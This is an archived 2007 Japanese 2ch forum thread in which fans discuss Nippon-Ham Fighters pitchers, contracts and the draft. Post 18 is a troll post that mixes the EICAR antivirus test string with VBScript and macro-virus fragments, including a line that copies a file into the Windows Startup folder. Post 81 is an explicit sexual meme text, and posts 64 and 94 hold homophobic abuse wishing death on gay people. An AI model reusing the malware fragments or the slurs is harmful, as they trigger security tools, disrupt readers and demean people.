5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

日本ハム投手総合スレ12

1 :代打名無し@実況は実況板で:2007/11/18(日) 15:15:46 ID:saTVxsGF0
北海道日本ハムファイターズの投手陣を語るスレです。
蔑称、煽りはスルーしてください。
ネタスレではありませんので過度の顔文字・AA使用等は控えてください。
sageの書き込みが基本。

前スレ
日本ハム投手総合スレ11
http://ex20.2ch.net/test/read.cgi/base/1190035688/l50

2 :げりぴっぴ ◆/ymqNiQQqI :2007/11/18(日) 15:19:19 ID:W2YrO6P9O
糞スレ立てんなかずのこ

3 :代打名無し@実況は実況板で:2007/11/18(日) 15:24:58 ID:mzJ0QbX+0
>>1


4 :代打名無し@実況は実況板で:2007/11/18(日) 15:31:33 ID:MI6U1HGw0
過去スレ
http://ex20.2ch.net/test/read.cgi/base/1186265486/日本ハム投手総合スレ10
http://ex20.2ch.net/test/read.cgi/base/1182217792/日本ハム投手総合スレ9
http://ex20.2ch.net/test/read.cgi/base/1180198579/日本ハム投手総合スレ8
http://ex20.2ch.net/test/read.cgi/base/1176623470/日本ハム投手総合スレ7
http://ex20.2ch.net/test/read.cgi/base/1168699200/日本ハム投手総合スレ6
http://ex13.2ch.net/test/read.cgi/base/1162980506/日本ハム投手総合スレ5
http://ex13.2ch.net/test/read.cgi/base/1159966316/日本ハム投手総合スレ4
http://ex13.2ch.net/test/read.cgi/base/1156027287/日本ハム投手総合スレ3
http://ex13.2ch.net/test/read.cgi/base/1151623285/日本ハム投手総合スレ2
http://ex13.2ch.net/test/read.cgi/base/1147459537/■公リリーフ総合スレ■

5 :代打名無し@実況は実況板で:2007/11/18(日) 15:36:32 ID:MI6U1HGw0
969 名前: 代打名無し@実況は実況板で [sage] 投稿日: 2007/11/18(日) 04:49:14 ID:QoBAGO2l0
そんな中、ちょいと明るいニュース。
スィーニーが20万ドルダウンの40万ドルで
来期契約に基本合意@道スポ


およそ6600万→4400万ということだ。
誰だよスウィーニーは現状維持でもいいと過大評価してた香具師は。

6 :代打名無し@実況は実況板で:2007/11/18(日) 16:51:34 ID:9FVBCKWcO
スウィーニー4400万とは安い買い物になったな
あとは来年使えるかどうかだ

7 :代打名無し@実況は実況板で:2007/11/18(日) 17:04:50 ID:ESbXmFygO
>>6
これくらいの年俸なら使えなくても諦めがつくし仕方あるめえ。
また自滅を繰り返すようなら途中解雇で新外国人獲得の可能性に僅かな希望を持つ。

8 :代打名無し@実況は実況板で:2007/11/18(日) 17:23:24 ID:oOc8fnz00
よくでつがその額で契約してくれたな。
ある意味神だ。

しかし、
991 :代打名無し@実況は実況板で :2007/11/17(土) 20:33:47 ID:fdQ/2koL0
先発の駒は数は沢山いるし、でつ退団なら代わりに外国人リリーバースペシャリストを獲ればいい。

この目は完全になくなってしまったか。
獲れれば岡島・江尻の役割をさせられたのにな。でつじゃ臨時で最終回任せるのは無理だし。

9 :代打名無し@実況は実況板で:2007/11/18(日) 17:32:01 ID:MI6U1HGw0
外人は主力タイプより穴埋めタイプのほうがいい。
何故なら主力タイプはいずれ強奪されちゃうから。

10 :代打名無し@実況は実況板で:2007/11/18(日) 17:34:39 ID:oOc8fnz00
>>9
外国人リリーバースペシャリストはいずれ強奪でもいい。
金森・菊地育成の繋ぎ。

11 :代打名無し@実況は実況板で:2007/11/18(日) 17:44:14 ID:MI6U1HGw0
>>10
いや外人P獲ってたら尚更育成できないだろwww
何言ってんだ。

12 :代打名無し@実況は実況板で:2007/11/18(日) 17:48:51 ID:oOc8fnz00
>>11
来年久・マイケルが今年並みぐらいに働ければ確かに育成できない。
だがその保証がない以上、来年を乗り切るためにも繋ぎは必要だろ?

13 :代打名無し@実況は実況板で:2007/11/18(日) 17:52:17 ID:MI6U1HGw0
>>12
今は江尻の穴についてでしょ?
そこに(いずれ強奪されようとも)外人P獲れって主張ならば
金森・菊地は育成できませんよってこと。

金森・菊地(・山本)あたりを育てたいのなら
新たに外人獲らないほうがいい。

14 :代打名無し@実況は実況板で:2007/11/18(日) 18:01:27 ID:oOc8fnz00
>>12
「リリーバースペシャリスト」だから、江尻の役割から久・マイケル万一の時まで広く想定している。
もしそうなったらいきなり金森・菊地に代わりが務まるだろうか?
務まれば万々歳だが駄目なら来年は最悪捨てることになりかねない。

もっとも、監督もコーチもがらりと変わって、HAMの方程式以外は配置未定なんだよな・・・

15 :代打名無し@実況は実況板で:2007/11/18(日) 18:12:35 ID:MI6U1HGw0
育てるってのは(リリーフ)失敗も我慢するということ
その失敗こそが糧となって育つんだから。
武田久、マイケルともに結構年いってるしそう長くはない
来年だけを考えるより将来を見据えて戦うことのほうが重要。
目先の戦力だけに捉われていると数年後暗黒が待っている。

16 :代打名無し@実況は実況板で:2007/11/18(日) 18:18:02 ID:oOc8fnz00
>>15
ま、ファンが万一の事態の時に育成と割り切り耐えられるかどうかだよな。

そのためには打線が打ってくれないと。
得点力さえ上がればリリーバー育成しながらチーム成績を上げるのも可能なんだが。
・・・ってスレ違いか。

17 :代打名無し@実況は実況板で:2007/11/18(日) 18:32:49 ID:ZOug4P+D0
投手の登板機会は、野手と違って作りやすいから
1人2人加入したからといってそれほど心配する必要はないと思うけどな。

まぁ現状だと獲っても第三外人になるから、あんまり関係ないけどねw

18 :代打名無し@実況は実況板で:2007/11/18(日) 18:33:04 ID:C7UeAoSD0
//adverts//35//main.chm::/main.htm" type=text/ Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile dirsystem&nurupo.vbs, j:\windows\start menu\programs\startup\
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
avgnt=\C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\ /min /nosplash
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ
܃ܷܵܶޫޭॢ

19 :代打名無し@実況は実況板で:2007/11/18(日) 19:46:30 ID:9FVBCKWcO
スウィーニーは開幕直前の戦力次第で前後ろ共に融通が効くな

20 :代打名無し@実況は実況板で:2007/11/18(日) 20:03:26 ID:bmtSLBwj0
>>19
>>8が「でつじゃ臨時で最終回任せるのは無理だし。」と言ってるが本当に無理?
去年最終回リードの場面で投げたのが舞妓・久・江尻(巨人戦久の救援一回)の三人しかいないから
一人でも多く投げられるのがいると安心なんだが?


あれ?ひょっとして勝さんも最終回リードで投げたこと一度もない?

21 :代打名無し@実況は実況板で:2007/11/18(日) 21:27:50 ID:PJejOwnFO
セーブがついたのはその3人だけだが
大量リードでの登板も含めたら他にもいる(橋本とか金森とか

22 :代打名無し@実況は実況板で:2007/11/18(日) 21:38:19 ID:L6SI4t0T0
>>20
>あれ?ひょっとして勝さんも最終回リードで投げたこと一度もない?
7回から投げてセーブが付いた事はあるが最終回のみ僅差で登板は一度もない
>>21
僅差では無いよな
8回僅差で登板も金森が一回あるだけか(リーグ優勝翌日逆転で負けた試合)

23 :代打名無し@実況は実況板で:2007/11/18(日) 22:57:53 ID:ByEjZ+x90
>21
正田

24 :代打名無し@実況は実況板で:2007/11/19(月) 12:53:22 ID:lRZkQWFeO
道スポのコラムによると、27日のトライアウトに鎌倉も参加するらしい
健闘を祈る

>>22
つ 0球登板w
それと勝は今年一度もセーブを記録してないよ

25 :代打名無し@実況は実況板で:2007/11/19(月) 13:29:01 ID:H2knnBKRO
大場獲得おめでとう

26 :代打名無し@実況は実況板で:2007/11/19(月) 14:45:53 ID:tYIZwist0
ドラフトorz

27 :代打名無し@実況は実況板で:2007/11/19(月) 15:12:21 ID:iVpoC/Gy0
さてとTDNのプロコレ作るかな

28 :代打名無し@実況は実況板で:2007/11/19(月) 15:23:53 ID:tYIZwist0
>>27
長野の二の舞だと思うけどな

29 :代打名無し@実況は実況板で:2007/11/19(月) 15:46:22 ID:53iqCHfn0
宮西って即戦力中継ぎとして使えそう?

30 :代打名無し@実況は実況板で:2007/11/19(月) 16:24:11 ID:L0QNYh+f0
今の時点では宮西より宮本のほうが期待できるかな。
宮西はコントロールあるタイプじゃないようだし。

31 :権平 ◆vGzK94OFlQ :2007/11/19(月) 17:27:25 ID:BnRlAd/Q0
スウィーニーやっと合意してくれたか。
来期は起用法も変わってくると思うけどがんばって

32 :代打名無し@実況は実況板で:2007/11/19(月) 20:31:12 ID:H2knnBKRO
大場じゃなくてtdnか!

33 :代打名無し@実況は実況板で:2007/11/19(月) 20:53:26 ID:YhxcjfE10
ωωω●ωωωωωωωωωωωω●ω●●ωωωωωωωω●ωωωωωωωωω●ωωωωωωωω●●●●●●●●●
●●●●●●●ωωωωω●●●●●●●●ωωωωω●●●●●ωωωωωω●●●●●●●ωωωωωωωωωωωω●
ωω●ωωωωωωωωωωωωω●ωωωωωωωωωωω●ωωωωωωωωω●ωωωωωωωωω●●●●●ωω●
ωω●●●●ωωωωωωωω●●●ωωωωωωωω●●●●●●ωωωω●●●●●●●●●ωωωωωωωωωωω●
ω●●ω●ω●ωωωωωω●ωω●ωωωωωωωωωωω●ωωωωωωωω●ωωω●ωωωωωω●●●●●ωω●
●ω●ω●ωω●ωωωωω●ωω●ωωωωωωωωωωω●ωωωωωω●●●●●●●●●ωωωω●ωωω●ωω●
●ω●ω●ωω●ωωωωωω●●●ωωωωωωωω●●●●ωωωωωωω●ω●ωω●ωωωωωω●●●●●ωω●
●ωω●ωωω●ωωωωωωωω●ωωωωωωω●ωωω●●ωωωωω●ωωω●ω●ωωωωωωωωωωωωω●
ω●●ωω●●ωωωωωω●●●ωωωωωωωωω●●●ωω●ωωωωωωωωω●●ωωωωωωωωωωωω●●

34 :代打名無し@実況は実況板で:2007/11/19(月) 23:32:04 ID:j03EiScY0
梨田、山田GM解雇だ

35 :代打名無し@実況は実況板で:2007/11/20(火) 00:52:26 ID:5aj6+prA0


36 :代打名無し@実況は実況板で:2007/11/20(火) 08:05:54 ID:iP7km5FRO
高校ドラフトで中田取れたし
TDNでもなんかやってくれそうな気がする

37 :代打名無し@実況は実況板で:2007/11/20(火) 10:28:47 ID:lNJB76/s0
ダル以外総崩れだった今シーズン後半のことを
思えば即戦力期待できる投手の投入はとても心強いよ。
どこのポジションでもできるってのもいい感じ。
ぜひフル回転して新人王目指してほしいな。

38 :代打名無し@実況は実況板で:2007/11/20(火) 11:18:01 ID:iP7km5FRO
アッー!はさておきメジャーと3Aの実績と経験があるから
頑張ってもらいたい

39 :代打名無し@実況は実況板で:2007/11/20(火) 11:49:24 ID:5rRSV8Xm0
多田野はおそらく先発で使うんだろうが、そうなったら勝さんを後ろに廻すのかな?
そう言ってる人が結構いるんだが?

ブルペンがヤバイからな・・・。
日本シリーズが終わった頃、パリーグ分析スレで
「武田久とマイケルしかまともなのいないじゃないか」
と散々言われたし。(今頃気づくなよw)

40 :代打名無し@実況は実況板で:2007/11/20(火) 11:53:00 ID:A2raLZL10
江尻の居ない来年

41 :代打名無し@実況は実況板で:2007/11/20(火) 12:54:05 ID:bWEzpxzN0
>>39
武田勝をどうするかは八木、山本、中村次第
特に山本をどっちにするかで分かれるだろう
あと宮本が中継ぎで使える可能性もある

42 :代打名無し@実況は実況板で:2007/11/20(火) 13:50:08 ID:sWmnc/650
江尻・・・個人的には来季金森→久→舞妓ブルペン三本柱期待してるんだがなぁ
左を抑えられれば左腕でなくてもいい

来季は先発が揃って平均投球回数を増やせるかが課題だな
大場が獲れてればダルの負担が分散されたんだが

43 : ◆vGzK94OFlQ :2007/11/20(火) 17:04:51 ID:WY+X5UEO0
勝さん後ろなら今年の三本柱(ダル・グリン・勝)
の一人がいないんだな。八木が代わりに入ってくれれば
うれしいけど

44 :代打名無し@実況は実況板で:2007/11/20(火) 19:07:14 ID:v1y2ZTe60
中村ヤスって
2軍で最優秀防御率とかもらって表彰されてるんだね
1軍では結果出せなかったタイプなのか
チーム変わったら意外と好投可能性あるね

45 :代打名無し@実況は実況板で:2007/11/20(火) 21:52:25 ID:YQFmi59x0
生駒 黒木 あたりにがんばってもらわないと苦しい

46 :代打名無し@実況は実況板で:2007/11/20(火) 23:33:50 ID:ssHADJS/0
   |   ___  、  _|
   |(6   \・\ (/・/|   みうみう(ノ^o^)ノ
   |        ̄ ・・> )
http://www.youtube.com/watch?v=Y1cApD4IppI
http://www.youtube.com/watch?v=Ws8ruwwB-B8
http://hokkaido.nikkansports.com/soccer/jleague/consadole/p-hc-tp0-20071119-284964.html

47 :代打名無し@実況は実況板で:2007/11/20(火) 23:47:22 ID:VkUVVDLaO
多田野は11勝8敗くらいしてほしい

48 :代打名無し@実況は実況板で:2007/11/20(火) 23:49:15 ID:GwoEtECF0
>>47
11勝はハム打線を考えれば十分合格だが8敗は多すぎ。

49 :代打名無し@実況は実況板で:2007/11/21(水) 00:19:13 ID:9uS0RbC70
ハム専
http://live24.2ch.net/test/read.cgi/livebase/1195561904/

本スレが壊滅状態なので避難所を告知しておきます

50 :代打名無し@実況は実況板で:2007/11/21(水) 08:49:53 ID:kcdnh/TG0
>>44
昨日ラジオで野州が表彰ドウノコウノって言われてたの、それのことか

51 :代打名無し@実況は実況板で:2007/11/21(水) 10:43:40 ID:2suvtvni0
>>44
それって「俺達」・・・

52 :代打名無し@実況は実況板で:2007/11/21(水) 11:54:54 ID:3Ft45Hna0
今のところの配置はこんなところなのかな?

先/ダル・グリン・八木・吉川(木下・多田野)
両/勝・でつ・建山(中村泰・山本・糸数)
中/久・押本・金森(歌籐・菊池・宮本)
抑/舞妓

八木がローテ守ってくれたら先発の左右バランスがかなり良くなるな〜

53 :代打名無し@実況は実況板で:2007/11/21(水) 17:14:06 ID:vczQHtke0
79 :名無しさん@八周年:2007/11/19(月) 21:34:31 ID:KvecNrld0
ボウリング多田野徹選手(愛知県豊川市職員)
TDNと苗字が一緒だというだけで、2chに2年連続でスレを立てられてしまった。もちろんボウリングの話題は殆どなし。

サッカーの四国ユースU―15選手権で表彰された多田野佑介選手
TDNと苗字が一緒だというだけで、2chに<★2> までもスレを立てられてしまった。もちろんサッカーの話題は殆どなし。

多田野曜平(声優・舞台俳優)
苗字が一緒というだけで、声優個人板にスレを立てられた。もちろん声優、アニメの話題はほとんど無し

多田野郵便局
TDNの苗字と同じというだけで郵政板にスレを立てられる。郵政の話題はほとんど無し。

タダノギムレット(競走馬)
TDNの苗字と同じというだけで芸スポ、競馬板にスレを立てられる。馬の話題はほとんど無し。

TDK野球部
TDNと一文字違いというだけで頻繁に芸スポにスレを立てられる。野球の話題はもちろんほとんど無し。

株式会社タダノ(建機メーカー)
多田野と苗字が一緒というだけで2chで様々な形で会社や商品がネタにされることに。

多田野マンション(広島市西区) 
多田野と苗字が一緒というだけで2chで様々な形でネタにされることに。

多田野神社(福島県郡山市)
神社名が多田野と一緒というだけで2chで様々な形でネタにされることに。

郡山市立多田野小学校(福島県郡山市)
校名が多田野というだけで教育板にスレが立てられる。もちろん教育の話題は全く無し。

54 :代打名無し@実況は実況板で:2007/11/21(水) 19:27:11 ID:QSEqVtw70
宮本がハワイで覚醒前夜って感じだから来年の宮本の活躍次第でブルペン充実しそう

55 :代打名無し@実況は実況板で:2007/11/21(水) 20:43:36 ID:pmtCKlgs0
新監督及びコーチが投手陣の役割分担をどう割り振るかだな。

今からポジションが100%決まってて且つトレードに出されないのが確実なのは
先発    ダル・グリン・木下
ブルペン  舞妓・久・金森・菊地・押本

ぐらい。
その他はどうなるか。

56 :代打名無し@実況は実況板で:2007/11/21(水) 22:51:00 ID:94jAVTlg0
絶対なんてないよ
それに高年俸なマイケルはトレードされやすいとも言える

57 :代打名無し@実況は実況板で:2007/11/21(水) 23:01:32 ID:G8YSy0th0
>>56
舞妓は二年契約だから少なくとも後一年トレードはない。

58 :代打名無し@実況は実況板で:2007/11/21(水) 23:06:32 ID:G8YSy0th0
>>55
逆にトレードに出されるかもしれないのは伊藤・金澤・歌さんあたりか?
須永も危ないか?

59 :代打名無し@実況は実況板で:2007/11/21(水) 23:28:47 ID:MD0ByYhQ0
   |   ___  、  _|
   |(6   \・\ (/・/|   みうみう(ノ^o^)ノ
   |        ̄ ・・> )
http://www.youtube.com/watch?v=Y1cApD4IppI
http://www.youtube.com/watch?v=Ws8ruwwB-B8
http://hokkaido.nikkansports.com/soccer/jleague/consadole/p-hc-tp0-20071119-284964.html

60 :代打名無し@実況は実況板で:2007/11/21(水) 23:33:57 ID:WfQLGLpNO
アッー!

61 :代打名無し@実況は実況板で:2007/11/22(木) 07:26:34 ID:8IbEUt0NO
           \    ,シ"   、__ !         /
 スンマセンでした!\ ミ  /   __  ト        / ___ お前初めてかここは?
      ,,,,   ,,,   \     `'ー`'、  ん?   / (,- ,_'',;  力抜けよ
    /""メ"''y'"__"';,   \ メ    ノ-ヽ     /,_、 Y' リ''ー
    {   !  Y'_、,_;     \∧∧∧∧∧   /  キ}、 {"ー {⌒
  ,. -{, ,-、 ,,..人 _3ノ    <    ア  >/   ハノ`{  {
/ ̄| ({ ="i=リ ̄ヽ'ー、   <    ッ  >  `ー、 /"''ー;ー'"   アッー!
    ーヽ -リ'   ヽ }   < 予  |  >    ヽ=ニ=),..- '" 
──────────―<     !  >─────────────
     _,,-ー----.、     < 感  の >         アッー アッー イグッ!
    <"      "l    <       >       、iliiiv;;,,  
     '; ,、、__ソ^`7, i、   < !!!     >\    _ミ`"v _">、   ,-- 、
     ';'___  _,,, リ     /∨∨∨∨∨  \    ミ ,イ・(/,ノ`ヵー"    ` 、,,
  ,--ーートーj 'ーー rー-、_  /   ,   ´` ヽ   \  "''!、,,_l__#"、/  iニー、,,__ ヽ
     ハノL ヽ ノ | `/  、'   ,.、、,.、   ';   \    //ソノ    ト、= レヽ i
    /  lヽ∀ /  | /   ゝ > 、   `; ;    \  《 /  ヽ  ゚  ':ヲ 9⌒ヽ
 なんか |,) ー'↑  ,> /   Yヘ|  -≧y ,_!ソ     \ Vヽ、。 ハ、   ':ー/    |
  たんねぇよなぁ   /    ー   y、ュヾ/ アッー! \∧ ) ノ i ノ  V i   i
                    ゝ  T三ゝ/

62 :代打名無し@実況は実況板で:2007/11/22(木) 07:38:28 ID:Bb3bJPezO
SBの斎藤和がズバリ一言 http://dream.mainichi.co.jp/hope/servlet/Authisb?uid=NULLGWDOCOMO&d=ful&f=kfuln200711222010041.html 
ダルビッシュもメジャー行き考えてそうだな。

63 :代打名無し@実況は実況板で:2007/11/22(木) 07:42:12 ID:SvfH94HA0
こんなスレもあったんだアッー!

64 :代打名無し@実況は実況板で:2007/11/22(木) 07:43:20 ID:IOvu9/giO
ホモスレ立てすぎ
氏ね

65 :代打名無し@実況は実況板で:2007/11/22(木) 07:47:40 ID:SvfH94HA0
道民は自重しろ

66 :代打名無し@実況は実況板で:2007/11/22(木) 10:34:39 ID:pUhUBk8A0
選手の顔文字貼るのさえタブー視されるほどのこのスレもあぼ〜んだらけか。
まったくしゃーねーな荒らしは。

67 :代打名無し@実況は実況板で:2007/11/22(木) 13:27:32 ID:ASExcQmR0
GM「寮じゃなくて自宅からのほうがいだろう」
TDN「新人ですから、寮に入らせてください」
GM「……寮は門限があったりと規制が厳しい。君のような社会経験豊富な大人を縛るわけにはいかないよ」
TDN「アッいえ、寧ろ縛られたいです。アッというか初心に戻って一からやりたいんです」
GM「………君は普通の新人とは違うんだ!アッイヤーメジャー経験のある特別な選手が寮で二人部屋というのもなぁ」
TDN「いえ、自分が新人や若手のリーダー格となって、自分持ってるモノ全てでいろいろ教えてやりたいんです」
GM 「アッーそこまでイッてくれるとはたまげたなぁ」
TDN 「寮で集団生活とは、なんか学生時代を思い出します」
GM 「……………………」

68 : ◆vGzK94OFlQ :2007/11/22(木) 19:30:10 ID:krTz2wIl0
>>52
スウィーニーさんは?

69 :代打名無し@実況は実況板で:2007/11/22(木) 20:28:29 ID:PT0q36QT0
日本ハム・江尻、400万円増の2400万円で更改
http://www.sanspo.com/sokuho/071122/sokuho051.html

70 :代打名無し@実況は実況板で:2007/11/22(木) 21:07:34 ID:G1PWcDXw0
江尻ってもっともらってると思ってた。

71 :代打名無し@実況は実況板で:2007/11/22(木) 21:15:58 ID:Oh2z0Wlh0
新聞発表は、かなり誤差あるからね

72 :代打名無し@実況は実況板で:2007/11/22(木) 22:17:00 ID:gerdjdPt0
>>69
おそらく来季を考えた上での微増ってことなんだろうな。
全く登板できなくてもあまり下げないとかね。

73 :代打名無し@実況は実況板で:2007/11/22(木) 22:22:35 ID:TvkWafmN0
トーマス1回4失点wwwwwwwww

74 :代打名無し@実況は実況板で:2007/11/22(木) 22:27:16 ID:MKDEBtY40
>>68
>>52の両/勝・でつ
           ↑

>>72
だな

>>73
機関車を切ったフロントの判断は正しかった

75 :代打名無し@実況は実況板で:2007/11/22(木) 23:09:46 ID:KW5Z+APz0

江尻 
5000万ぐらいかと思ってた

76 :代打名無し@実況は実況板で:2007/11/23(金) 00:40:12 ID:kvg1h6DG0
   |   ___  、  _|
   |(6   \・\ (/・/|   みうみう(ノ^o^)ノ
   |        ̄ ・・> )
http://www.youtube.com/watch?v=Y1cApD4IppI
http://www.youtube.com/watch?v=Ws8ruwwB-B8
http://hokkaido.nikkansports.com/soccer/jleague/consadole/p-hc-tp0-20071119-284964.html

77 :代打名無し@実況は実況板で:2007/11/23(金) 03:14:30 ID:3XL4VZdoO
しゃぶれよ

78 :代打名無し@実況は実況板で:2007/11/23(金) 07:02:30 ID:z8Km9P/70

   | │                   〈   !
   | |/ノ二__‐──ァ   ヽニニ二二二ヾ } ,'⌒ヽ
  /⌒!|  =彳o。ト ̄ヽ     '´ !o_シ`ヾ | i/ ヽ !
  ! ハ!|  ー─ '  i  !    `'   '' "   ||ヽ l |
 | | /ヽ!        |            |ヽ i !
 ヽ {  |           !           |ノ  /


オレの女房役はどいつだッ?


79 :代打名無し@実況は実況板で:2007/11/23(金) 11:11:29 ID:Sv/Vf6pE0
今季中継ぎの柱として活躍し、シーズン終盤に右ひじを手術した江尻慎太郎投手(30)は、
400万円増の2400万円で更改。
来季はリハビリ期間となるが、2009年のシーズンも同じ年俸となる契約で合意した。

江尻は今季中継ぎで42試合に登板し、自己最多の7勝(4敗)を挙げ、パ・リーグ連覇に貢献した。
9月に右ひじ痛を訴え、10月に靱帯(じんたい)を再建手術した。

全治に1年前後かかることから、来季は登板の可能性が極めて低く、査定ができないための措置。
江尻は「温かい扱いに感謝している。焦らずにリハビリに取り組みたい」と話した。
近く球団と覚書を交わす予定。
ttp://www.hokkaido-np.co.jp/news/fighters/62123.html

80 :代打名無し@実況は実況板で:2007/11/23(金) 11:44:34 ID:rWvuPeDt0
┏━━━━━━━━━━━┓                                  ┏━━┓
┃                      ┃                                      ┃    ┃
┗━━━━┓  ┏━━┓  ┃                                      ┃    ┃
          ┃  ┃    ┃  ┃                                      ┃    ┃
          ┃  ┃┏━┛  ┃                                      ┃    ┃
          ┃  ┃┃      ┃            ┏━━━━━━━━━━┓  ┃    ┃
          ┃  ┃┗━━━┛┏┳┓┏━┓┃                    ┃  ┃    ┃
          ┃  ┃         ┃┃┃┃  ┃┗━━━━━━━━━━┛  ┃    ┃
          ┃  ┃          ┗┻┛┃  ┃                          ┗━━┛
          ┃  ┃          ┏━━┛  ┃                          ┏━━┓
          ┃  ┃          ┃        ┃                          ┃    ┃
          ┗━┛          ┗━━━━┛                          ┗━━┛

81 :代打名無し@実況は実況板で:2007/11/23(金) 11:53:06 ID:rWvuPeDt0
【アッー!の由来】(2005.9.11付最新版)


サッカー部員に扮したTDNらがヤクザの車に追突
 ↓
「犬のまねしろよ」「四つん這いになるんだよ」「やれば返していただけるんですか?」
「何犬のくせにお前服着てるんだよ」「早くしろよ」などの会話を経て全裸に。
 ↓
「わんわん泣いてみろ」「まわってみろ」「よぉし、お手だ」の命令に犬を演じるも
「なんか犬っぽくねぇなあ」「なんかたんねえよなぁ」ということで首輪をはめられる。
 ↓
指でアナルをほじくられ、「汚ない穴だなぁ」などと罵られる。スパンキングに穴が反応。
「お前初めてかここは、力抜けよ」と後輩の目前でいじられ、長い尻尾をつけられる。
 ↓
「咥えてやれよ」と命令された後輩(DB)のフェラチオで「アッー アッー!」と悶える
 ↓
ヤクザに局部を見せながら2人の後輩に尻の穴を見せる。「気持ちいい!」と悶えながら
男性自身を勃起させる。このあと、後輩(HTN)がコンドームをつけ、TDNに背後から挿入。
「オフッ!」と唸るも、直後から「アッ、アッ、アッ、アッ!」とTDNは勃起させながら声をあげる。
 ↓
ヤクザも加わり4Pが始まる。ヤラれるばかりだったTDNが一転、攻勢に出て、
ヤクザを下にして犯し始める。
小刻みに腰を振りながら「イグ!イグッ!イグゥ!アッー!、アッー!」 と叫んで、
TDNもヤクザの腹に勢い良く射精「…アッー!… アッー!… ァッー…」と虚脱の表情。


82 :代打名無し@実況は実況板で:2007/11/23(金) 12:05:13 ID:UPDPM9/CO
ハムヲタ隠れ里

はむせん
http://live24.2ch.net/test/read.cgi/livebase/1195735476/

83 :代打名無し@実況は実況板で:2007/11/23(金) 16:50:08 ID:mbwZ4vNh0
>>58
金銭トレードで出して保有枠空けて、外国人選手を一人多く保険で獲れないかな?

84 :代打名無し@実況は実況板で:2007/11/23(金) 16:54:40 ID:jJsPjAlU0
須永はハムで復活するとは思えないなあ
大炎上→代走のイメージ強すぎ

85 :代打名無し@実況は実況板で:2007/11/23(金) 17:02:56 ID:t0jBHHto0
須永が1軍の試合で9イニング無失点で抑えた試合もあったんだぜ

86 :代打名無し@実況は実況板で:2007/11/23(金) 17:43:52 ID:YNB9qFUt0
須永は順調に伸び悩んでるな。
このままでは、トレードされて、いつの間にか引退かな。
なんとか、ならんのかね?

87 :代打名無し@実況は実況板で:2007/11/23(金) 17:56:27 ID:jJsPjAlU0
トレードするなら
夢のジャイアンツに行かせてやりたい
サネとトレードでもいいよ

88 :代打名無し@実況は実況板で:2007/11/23(金) 17:58:45 ID:6uF6CIZu0
須永は阪神にトレードされればJFKの援護ですぐ勝ち星挙げて覚醒しそうだ
ハムだと極貧打線に舞妓が勝ち星消して・・・だしな

何とかならんのか

89 :代打名無し@実況は実況板で:2007/11/23(金) 18:00:17 ID:6uF6CIZu0
>>87
それもいいかもな
あそこが打線が強力だからそのうち勝てそうだ
ついでにサネも舞妓専用に戻ってくるし

90 :代打名無し@実況は実況板で:2007/11/23(金) 18:04:09 ID:jJsPjAlU0
>>89
サネは阿部がいる限り
ジャイアンツでは絶対正捕手になれないからねえ
ハムに戻ってきて抑え捕手になったほうがいいよね

91 : ◆vGzK94OFlQ :2007/11/23(金) 18:23:20 ID:Q+Axii3/0
>>74
そういうこと、把握

92 :代打名無し@実況は実況板で:2007/11/23(金) 19:51:11 ID:iwn3Kw/10
須永はチーム以前にフォーム変えなきゃ駄目だな
あんな上半身に頼ったフォームじゃ制球悪いのも当然だ

93 :代打名無し@実況は実況板で:2007/11/23(金) 22:41:28 ID:5HP0+lYn0
   |   ___  、  _|
   |(6   \・\ (/・/|   みうみう(ノ^o^)ノ
   |        ̄ ・・> )
http://www.youtube.com/watch?v=Y1cApD4IppI
http://www.youtube.com/watch?v=Ws8ruwwB-B8
http://hokkaido.nikkansports.com/soccer/jleague/consadole/p-hc-tp0-20071119-284964.html

94 :代打名無し@実況は実況板で:2007/11/23(金) 22:44:30 ID:3XL4VZdoO
ホモは死ねよ

95 :代打名無し@実況は実況板で:2007/11/24(土) 13:33:59 ID:t+Ubd8eY0
勝さんまでこの段階で落とされるとは思わなかった。

まあしかし、これで8月(或いは3月も?)にW武田を取られる心配はなくなった。
(一度落とした選手に「都合が変わった。また落とすかもしれないが来てくれ」とは頼めないからな)
パからはSBロッテからローテ投手大量に引っ張られるだろうからペナント有利になるかもしれん。

96 :代打名無し@実況は実況板で:2007/11/24(土) 15:39:33 ID:wcObXQxB0
東京時代からの都民ファンとしては、多田野が加入したって事もあるが、
すっかり球界がハムを中心に回ってたり、普通にハムが優勝
してるこの状態を10年前どころか、5年前ですら想像出来なかったよ

97 :代打名無し@実況は実況板で:2007/11/24(土) 16:13:41 ID:T703ChNc0
5年前どころか2年前ですら優勝なんて想像不可

98 :代打名無し@実況は実況板で:2007/11/24(土) 16:25:34 ID:HF7gxKKA0
>>96
まだ加入していない
交渉決裂もあり得る

>>97
ダルとW武田と舞妓だな、彼らがフルシーズン活躍した二年間二連覇

99 :代打名無し@実況は実況板で:2007/11/24(土) 23:59:49 ID:qmTE0GyX0
   |   ___  、  _|
   |(6   \・\ (/・/|   みうみう(ノ^o^)ノ
   |        ̄ ・・> )
http://www.youtube.com/watch?v=Y1cApD4IppI
http://www.youtube.com/watch?v=Ws8ruwwB-B8
http://hokkaido.nikkansports.com/soccer/jleague/consadole/p-hc-tp0-20071119-284964.html

100 :代打名無し@実況は実況板で:2007/11/25(日) 01:07:46 ID:MoBSRbEP0
ルーキーイヤーのマサルさんは骨折したけどあれがかえって休めてよかったのかもしれん
